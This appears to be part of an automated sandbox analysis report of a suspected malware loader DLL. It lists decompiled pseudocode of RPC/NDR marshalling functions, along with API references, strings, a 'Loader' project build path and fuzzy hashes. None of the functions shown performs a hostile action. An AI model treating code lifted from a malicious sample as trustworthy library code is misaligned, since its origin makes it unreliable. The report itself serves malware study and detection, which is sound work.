                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: CapsCreateDeviceFontIndirect
                                                                                                • String ID:
                                                                                                • API String ID: 3272661963-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 53%
                                                                                                			E6EDA5070(void* __eflags, int _a4, intOrPtr _a8, signed short* _a12) {
                                                                                                				signed char* _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				intOrPtr _v44;
                                                                                                				intOrPtr _t121;
                                                                                                				intOrPtr _t123;
                                                                                                				intOrPtr _t129;
                                                                                                				intOrPtr _t166;
                                                                                                				void* _t204;
                                                                                                				void* _t206;
                                                                                                
                                                                                                				_v8 = 0;
                                                                                                				_v16 = 0;
                                                                                                				_v44 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                                				_v32 = 0;
                                                                                                				_v24 = 0;
                                                                                                				_v20 = 0;
                                                                                                				_v28 = 0;
                                                                                                				0x6eda0000("(%p,%p,%p)\n", _a4, _a8, _a12);
                                                                                                				E6EDA73B0(_a4 + 0x14, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
                                                                                                				_t206 = _t204 + 0x18;
                                                                                                				if( *((intOrPtr*)(_a4 + 0x30)) == 0) {
                                                                                                					_t166 = _a4;
                                                                                                					_t212 =  *((intOrPtr*)(_t166 + 0x6c));
                                                                                                					if( *((intOrPtr*)(_t166 + 0x6c)) == 0) {
                                                                                                						_v36 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                                						_v12 =  *((intOrPtr*)(_a4 + 0x14));
                                                                                                						 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                                						E6EDA5070(_t212, _a4, _a8, _a12);
                                                                                                						 *((intOrPtr*)(_a4 + 0x30)) = _v36;
                                                                                                						 *((intOrPtr*)(_a4 + 0x6c)) =  *((intOrPtr*)(_a4 + 0x14));
                                                                                                						_v32 = 1;
                                                                                                						0x6eda0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x6c)) - _v12);
                                                                                                						_t206 = _t206 + 8;
                                                                                                						 *((intOrPtr*)(_a4 + 0x14)) = _v12;
                                                                                                					}
                                                                                                				}
                                                                                                				_a12 =  &(_a12[2]);
                                                                                                				if( *_a12 != 0) {
                                                                                                					_v8 = _a12 +  *_a12;
                                                                                                				}
                                                                                                				_a12 =  &(_a12[1]);
                                                                                                				if(( *_a12 & 0x0000ffff) != 0) {
                                                                                                					_v16 = _a12 + ( *_a12 & 0x0000ffff);
                                                                                                				}
                                                                                                				_a12 =  &(_a12[1]);
                                                                                                				 *((intOrPtr*)(_a4 + 0x1c)) = _a8;
                                                                                                				if(_v8 != 0) {
                                                                                                					_t129 = _a4;
                                                                                                					0x6eda0000(_t129, _a12);
                                                                                                					_v40 = _t129;
                                                                                                					E6EDACC40( *_v8 & 0x000000ff, _a4, _a8 + _v40, _v8);
                                                                                                					_t206 = _t206 + 0x18;
                                                                                                					_v20 =  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                					_v24 =  *((intOrPtr*)(_a4 + 0x44));
                                                                                                					_v28 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                                				}
                                                                                                				_t121 = E6EDA8B40(_a4, _a8, _a12, _v16);
                                                                                                				_a8 = _t121;
                                                                                                				if(_v8 != 0) {
                                                                                                					 *((intOrPtr*)(_a4 + 0x3c)) = _v20;
                                                                                                					 *((intOrPtr*)(_a4 + 0x44)) = _v24;
                                                                                                					 *((intOrPtr*)(_a4 + 0x40)) = _v28;
                                                                                                					_t121 = E6EDACE70( *_v8 & 0x000000ff, _a4, _a8, _v8, 1);
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_a4 + 0x1c)) = _v44;
                                                                                                				if(_v32 == 0) {
                                                                                                					return _t121;
                                                                                                				} else {
                                                                                                					 *((intOrPtr*)(_a4 + 0x14)) =  *((intOrPtr*)(_a4 + 0x6c));
                                                                                                					_t123 = _a4;
                                                                                                					 *((intOrPtr*)(_t123 + 0x6c)) = 0;
                                                                                                					return _t123;
                                                                                                				}
                                                                                                			}




















                                                                                                APIs
                                                                                                • _NdrComplexStructBufferSize@12.SOZZ(00000000,00000000,00000000), ref: 6EDA511E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: BufferComplexSize@12Struct
                                                                                                • String ID: (%p,%p,%p)$difference = 0x%x
                                                                                                • API String ID: 1319815426-1308788287
                                                                                                • Opcode ID: 96950c64940c8fd3095e5b62f37a4d0d13a46c3978f38573632ab271eaa704c0
                                                                                                • Instruction ID: 58c7fde49c974921dc6da8f0e573822ccf3555090c7f9420528d4f27984938f1
                                                                                                • Opcode Fuzzy Hash: 96950c64940c8fd3095e5b62f37a4d0d13a46c3978f38573632ab271eaa704c0
                                                                                                • Instruction Fuzzy Hash: 7F81E7B4A00209EFDB44CF98C890AAE7BB6FF88354F108558ED199B341D735EA51CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 53%
                                                                                                			E6EDA6310(intOrPtr _a4, signed char* _a8) {
                                                                                                				signed char _v5;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                
                                                                                                				0x6eda0000("(%p, %p)\n", _a4, _a8);
                                                                                                				if(( *_a8 & 0x000000ff) == 0x1f || ( *_a8 & 0x000000ff) == 0x20) {
                                                                                                					_v5 = (_a8[1] & 0x000000ff) + 1;
                                                                                                					if(( *_a8 & 0x000000ff) != 0x1f) {
                                                                                                						_a8 =  &(_a8[2]);
                                                                                                						_v16 =  *_a8;
                                                                                                						_a8 =  &(_a8[4]);
                                                                                                						_v12 =  *_a8;
                                                                                                						_a8 =  &(_a8[4]);
                                                                                                					} else {
                                                                                                						_a8 =  &(_a8[2]);
                                                                                                						_v16 =  *_a8 & 0x0000ffff;
                                                                                                						_a8 =  &(_a8[2]);
                                                                                                						_v12 =  *_a8 & 0x0000ffff;
                                                                                                						_a8 =  &(_a8[2]);
                                                                                                					}
                                                                                                					_v20 =  *_a8 & 0x0000ffff;
                                                                                                					_a8 =  &(_a8[2]);
                                                                                                					_a8 = E6EDAA540(_a4, _a4, _a8, _v12);
                                                                                                					E6EDA73D0(_a4, _a4 + 4, _v5 & 0x000000ff);
                                                                                                					E6EDAAF00(_a4, E6EDAAEC0(_v20,  *((intOrPtr*)(_a4 + 0x44))));
                                                                                                					 *((intOrPtr*)(_a4 + 0x18)) =  *((intOrPtr*)(_a4 + 0x18)) + _v16;
                                                                                                					E6EDAC7E0(_a4, _a8);
                                                                                                					return  *((intOrPtr*)(_a4 + 0x18));
                                                                                                				} else {
                                                                                                					0x6eda0000("invalid format type %x\n",  *_a8 & 0x000000ff);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}








                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6375
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-285380529
                                                                                                • Opcode ID: 55e6c966d91f8de8470c43f36afe8c6a6d8cf4b17d98fbe9669fd89a70e38cdd
                                                                                                • Instruction ID: f11ca3884b36cf119fc4ed7d2712e207cb40720620d49d9c502f10e8a96af2c6
                                                                                                • Opcode Fuzzy Hash: 55e6c966d91f8de8470c43f36afe8c6a6d8cf4b17d98fbe9669fd89a70e38cdd
                                                                                                • Instruction Fuzzy Hash: 19513BB5A04108AFCB44CF99C490AAD7BB6EF89314F04C069FD698F341D635EA51CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 64%
                                                                                                			E6EDA34D0(void* __eflags, intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
                                                                                                				intOrPtr _v8;
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _t67;
                                                                                                				void* _t100;
                                                                                                				void* _t102;
                                                                                                				void* _t103;
                                                                                                
                                                                                                				_v12 = _a12[2] & 0x0000ffff;
                                                                                                				0x6eda0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                                				E6EDA73D0(_a12, _a4 + 4, (_a12[1] & 0x000000ff) + 1);
                                                                                                				_t102 = _t100 + 0x1c;
                                                                                                				_t71 = _a16 & 0x000000ff;
                                                                                                				if((_a16 & 0x000000ff) == 0) {
                                                                                                					if(( *(_a4 + 0x20) & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                                						 *_a8 =  *((intOrPtr*)(_a4 + 4));
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t67 = E6EDAA3B0(_t71, _a4, _v12);
                                                                                                					_t102 = _t102 + 8;
                                                                                                					 *_a8 = _t67;
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                                				_v8 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                                				E6EDAAF00(_a4, _v12);
                                                                                                				_t103 = _t102 + 8;
                                                                                                				if(( *_a12 & 0x000000ff) == 0x16) {
                                                                                                					E6EDAC2B0(_a4, _v8,  *_a8,  &(_a12[4]), _a16 & 0x000000ff);
                                                                                                					_t103 = _t103 + 0x14;
                                                                                                				}
                                                                                                				0x6eda0000("copying %p to %p\n", _v8,  *_a8);
                                                                                                				if( *_a8 != _v8) {
                                                                                                					E6EDB0120( *_a8, _v8, _v12);
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}










                                                                                                APIs
                                                                                                • _memmove.LIBCMT ref: 6EDA35E7
                                                                                                  • Part of subcall function 6EDAA3B0: NdrAllocate.RPCRT4(00000000,6EDAB93B), ref: 6EDAA3BC
                                                                                                  • Part of subcall function 6EDAA3B0: _memset.LIBCMT ref: 6EDAA3CF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Allocate_memmove_memset
                                                                                                • String ID: (%p,%p,%p,%d)$copying %p to %p
                                                                                                • API String ID: 3695251382-1064448161
                                                                                                • Opcode ID: e6b978eddfc84d8a739c6f0f6c45a67f168a83697eb562fa46348004199192bf
                                                                                                • Instruction ID: 2c198d28c2652f61accd1c74d8cc2661044578390aef53919078c143f97258d9
                                                                                                • Opcode Fuzzy Hash: e6b978eddfc84d8a739c6f0f6c45a67f168a83697eb562fa46348004199192bf
                                                                                                • Instruction Fuzzy Hash: 764131B5604148ABCB04DF9CD890D9E7BBAEF89304F10C559FD599B345E730EA50CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 76%
                                                                                                			E6EDADCB4(void* __ebx, void* __edi, void* __esi) {
                                                                                                				signed short _t55;
                                                                                                				intOrPtr _t57;
                                                                                                				void* _t65;
                                                                                                				intOrPtr _t67;
                                                                                                				intOrPtr _t69;
                                                                                                				void* _t103;
                                                                                                				void* _t105;
                                                                                                				void* _t109;
                                                                                                				void* _t110;
                                                                                                
                                                                                                				 *(_t103 - 1) = ( *( *((intOrPtr*)(_t103 + 0x14)) + (1 << 0)) & 0x000000ff) + 1;
                                                                                                				 *((intOrPtr*)(_t103 + 0x14)) = E6EDAA440( *(_t103 + 0xc),  *((intOrPtr*)(_t103 + 0x14)) + 4);
                                                                                                				 *((intOrPtr*)(_t103 + 0x14)) = E6EDAA540( *(_t103 + 0xc),  *(_t103 + 0xc),  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c)));
                                                                                                				_t55 =  *(_t103 + 0xc);
                                                                                                				0x6eda0000(_t55,  *((intOrPtr*)(_t103 + 0x14)));
                                                                                                				 *(_t103 - 8) = _t55;
                                                                                                				_t92 =  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c));
                                                                                                				_t57 = E6EDAAEC0( *(_t103 - 8) & 0x0000ffff,  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c)));
                                                                                                				_t109 = _t105 + 0x24;
                                                                                                				 *((intOrPtr*)(_t103 - 0x14)) = _t57;
                                                                                                				_t112 =  *(_t103 + 0x20) & 0x000000ff;
                                                                                                				if(( *(_t103 + 0x20) & 0x000000ff) == 0) {
                                                                                                					_push(0xab4);
                                                                                                					E6EDAFA71(__ebx, _t92, __edi, __esi, _t112, L"fUnmarshall", L"C:\\xampp\\htdocs\\Loct\\fb11756e47a4488bb45f8c56ea0c6221\\Loader\\Project4\\Project4\\Source.c");
                                                                                                					_t109 = _t109 + 0xc;
                                                                                                				}
                                                                                                				if(( *(_t103 + 0x18) & 0x000000ff) == 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10)))) == 0) {
                                                                                                					 *(_t103 + 0x18) = 1;
                                                                                                				}
                                                                                                				if(( *(_t103 + 0x18) & 0x000000ff) != 0) {
                                                                                                					_t69 = E6EDAA3B0( *(_t103 + 0xc),  *(_t103 + 0xc),  *((intOrPtr*)(_t103 - 0x14)));
                                                                                                					_t109 = _t109 + 8;
                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10)))) = _t69;
                                                                                                				}
                                                                                                				E6EDA73D0( *(_t103 + 0xc) + 4,  *(_t103 + 0xc) + 4,  *(_t103 - 1) & 0x000000ff);
                                                                                                				_t110 = _t109 + 8;
                                                                                                				 *((intOrPtr*)(_t103 - 0x10)) =  *((intOrPtr*)( *(_t103 + 0xc) + 4));
                                                                                                				 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10))));
                                                                                                				 *((intOrPtr*)(_t103 - 0x28)) =  *((intOrPtr*)( *(_t103 + 0xc) + 0x44));
                                                                                                				 *((intOrPtr*)(_t103 - 0x1c)) = 0;
                                                                                                				while( *((intOrPtr*)(_t103 - 0x1c)) <  *((intOrPtr*)(_t103 - 0x28))) {
                                                                                                					_t67 = E6EDA9560( *(_t103 + 0xc),  *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0x14)), 0,  *(_t103 + 0x18) & 0x000000ff);
                                                                                                					_t110 = _t110 + 0x14;
                                                                                                					 *((intOrPtr*)(_t103 - 0x20)) = _t67;
                                                                                                					 *((intOrPtr*)(_t103 - 0x1c)) =  *((intOrPtr*)(_t103 - 0x1c)) + 1;
                                                                                                				}
                                                                                                				_t65 =  *((intOrPtr*)( *(_t103 + 0xc) + 4)) -  *((intOrPtr*)(_t103 - 0x10));
                                                                                                				return _t65;
                                                                                                			}













                                                                                                APIs
                                                                                                  • Part of subcall function 6EDAAEC0: RpcRaiseException.RPCRT4(000006C6,?,?), ref: 6EDAAEE3
                                                                                                • __wassert.LIBCMT ref: 6EDADD3B
                                                                                                  • Part of subcall function 6EDAFA71: GetModuleHandleExW.KERNEL32(00000006,?,?), ref: 6EDAFB36
                                                                                                  • Part of subcall function 6EDAFA71: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6EDAFB62
                                                                                                Strings
                                                                                                • C:\xampp\htdocs\Loct\fb11756e47a4488bb45f8c56ea0c6221\Loader\Project4\Project4\Source.c, xrefs: 6EDADD31
                                                                                                • fUnmarshall, xrefs: 6EDADD36
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Module$ExceptionFileHandleNameRaise__wassert
                                                                                                • String ID: C:\xampp\htdocs\Loct\fb11756e47a4488bb45f8c56ea0c6221\Loader\Project4\Project4\Source.c$fUnmarshall
                                                                                                • API String ID: 172140284-267874950
                                                                                                • Opcode ID: b0cf3447c02a1fb4e14999fbaf84d01b9d17e4486575f10e6ce410e178ffa9a4
                                                                                                • Instruction ID: d5962b6373103857557095deff8fab07be459c82d338c61e474b070689566684
                                                                                                • Opcode Fuzzy Hash: b0cf3447c02a1fb4e14999fbaf84d01b9d17e4486575f10e6ce410e178ffa9a4
                                                                                                • Instruction Fuzzy Hash: 0E4152B5A00249AFCF44CF98D890ADE7BB5AF49308F148559FD19AB341E335DA11CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: unhandled embedded type %02x$unknown type 0x%x
                                                                                                • API String ID: 0-2047435921
                                                                                                • Opcode ID: 9ec65198c260007dee1c82979dd69c5917c6ec56142e83531dcc1c96435c9326
                                                                                                • Instruction ID: e32acf22ea63e8a0b1b2e70e9ecce075ea519c9b2d0d89767a1a0b96a7b40e36
                                                                                                • Opcode Fuzzy Hash: 9ec65198c260007dee1c82979dd69c5917c6ec56142e83531dcc1c96435c9326
                                                                                                • Instruction Fuzzy Hash: 0B415770A04464EFDB04CF9DD440BA8B7B6EB42B11F10C16AFEA98B381D675DB81CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA16F0(intOrPtr _a4, intOrPtr _a8, signed char* _a12) {
                                                                                                				signed char* _v8;
                                                                                                				signed char* _v12;
                                                                                                				signed int _v16;
                                                                                                
                                                                                                				_v8 = _a12;
                                                                                                				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
                                                                                                				if(( *_v8 & 0x000000ff) == 0x1d || ( *_v8 & 0x000000ff) == 0x1e) {
                                                                                                					E6EDA7400(_v8, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                                					if(( *_v8 & 0x000000ff) != 0x1d) {
                                                                                                						_v12 = _a12;
                                                                                                						_v16 =  *((intOrPtr*)(_v12 + 2));
                                                                                                						_a12 = _v12 + 6;
                                                                                                					} else {
                                                                                                						_v16 = _v8[2] & 0x0000ffff;
                                                                                                						_a12 =  &(_v8[4]);
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                                					E6EDAB030(_a4, _a8, _v16);
                                                                                                					_a12 = E6EDABFC0(_a4, _a8, _a12);
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}







                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA1744
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: ccf16af2322fff6f1779564879cb0a22d0bed9f83c08f10c35b53ebcac639b0e
                                                                                                • Instruction ID: d7546ea38672435527c258e4fa4f298cbe7dbcd98cfaefc1574d840663b3973d
                                                                                                • Opcode Fuzzy Hash: ccf16af2322fff6f1779564879cb0a22d0bed9f83c08f10c35b53ebcac639b0e
                                                                                                • Instruction Fuzzy Hash: 29314FB5A04148EFCB04CF99D8809AE7BB5AF89204F148558F9199B345E330EB11CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 46%
                                                                                                			E6EDA4490(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
                                                                                                				void* _t40;
                                                                                                				void* _t61;
                                                                                                				void* _t62;
                                                                                                				void* _t63;
                                                                                                				void* _t64;
                                                                                                
                                                                                                				0x6eda0000("(pStubMsg == ^%p, *pMemory == ^%p, pFormat == ^%p, fMustAlloc == %u)\n", _a4,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                                				_t64 = _t63 + 0x14;
                                                                                                				if(( *_a12 & 0x000000ff) != 0x22 && ( *_a12 & 0x000000ff) != 0x25) {
                                                                                                					0x6eda0000("Unhandled string type: %#x\n",  *_a12 & 0x000000ff);
                                                                                                					_t64 = _t64 + 8;
                                                                                                					__imp__RpcRaiseException(0x6f7);
                                                                                                				}
                                                                                                				if(( *_a12 & 0x000000ff) != 0x22) {
                                                                                                					E6EDAD650(0x25, _a4, _a12);
                                                                                                					E6EDAD830(_t40, _t61, _t62, 0x25, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
                                                                                                				} else {
                                                                                                					E6EDAD650(0x22, _a4, _a12);
                                                                                                					E6EDAD830(_t40, _t61, _t62, 0x22, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}









                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA44F4
                                                                                                Strings
                                                                                                • (pStubMsg == ^%p, *pMemory == ^%p, pFormat == ^%p, fMustAlloc == %u), xrefs: 6EDA44A6
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA44E2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, *pMemory == ^%p, pFormat == ^%p, fMustAlloc == %u)$Unhandled string type: %#x
                                                                                                • API String ID: 3997070919-339230053
                                                                                                • Opcode ID: a76abc7bbbb805cc9200d0cfcc83bb6db54a35e8f07dff5b84a3802d284b7e7e
                                                                                                • Instruction ID: 041b5e5a6e42387d8b70f1a952c96a817d41e727355b6b2046fa34520704a62a
                                                                                                • Opcode Fuzzy Hash: a76abc7bbbb805cc9200d0cfcc83bb6db54a35e8f07dff5b84a3802d284b7e7e
                                                                                                • Instruction Fuzzy Hash: 5A21BFB16042856BD704CF98DC91EBB37AEAB89704F048418FE198B2C2D671DA61CB71
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA60F0(intOrPtr _a4, signed char* _a8) {
                                                                                                				signed char* _v8;
                                                                                                				signed int _v12;
                                                                                                				signed char* _v16;
                                                                                                
                                                                                                				_v8 = _a8;
                                                                                                				0x6eda0000("(%p, %p)\n", _a4, _a8);
                                                                                                				if(( *_v8 & 0x000000ff) == 0x1d || ( *_v8 & 0x000000ff) == 0x1e) {
                                                                                                					E6EDA73D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                                					if(( *_v8 & 0x000000ff) != 0x1d) {
                                                                                                						_v16 = _a8;
                                                                                                						_v12 =  *((intOrPtr*)(_v16 + 2));
                                                                                                						_a8 = _v16 + 6;
                                                                                                					} else {
                                                                                                						_v12 = _v8[2] & 0x0000ffff;
                                                                                                						_a8 =  &(_v8[4]);
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                                					E6EDAAF00(_a4, _v12);
                                                                                                					 *((intOrPtr*)(_a4 + 0x18)) =  *((intOrPtr*)(_a4 + 0x18)) + _v12;
                                                                                                					E6EDAC7E0(_a4, _a8);
                                                                                                					return _v12;
                                                                                                				} else {
                                                                                                					0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}







                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6140
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-285380529
                                                                                                • Opcode ID: ca7efb92246d78721c76b3d4cf709a71e7f400176bb5c09a644d221b7537c67e
                                                                                                • Instruction ID: 1851269300e78767c6d47200213c10f4e40ca84a442ca0fb40e51eea0e1a6acb
                                                                                                • Opcode Fuzzy Hash: ca7efb92246d78721c76b3d4cf709a71e7f400176bb5c09a644d221b7537c67e
                                                                                                • Instruction Fuzzy Hash: 99312CB5A00108EFCB04CF99C8909ADBBB6AF89255F14C199F9599B346D730EF50DB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

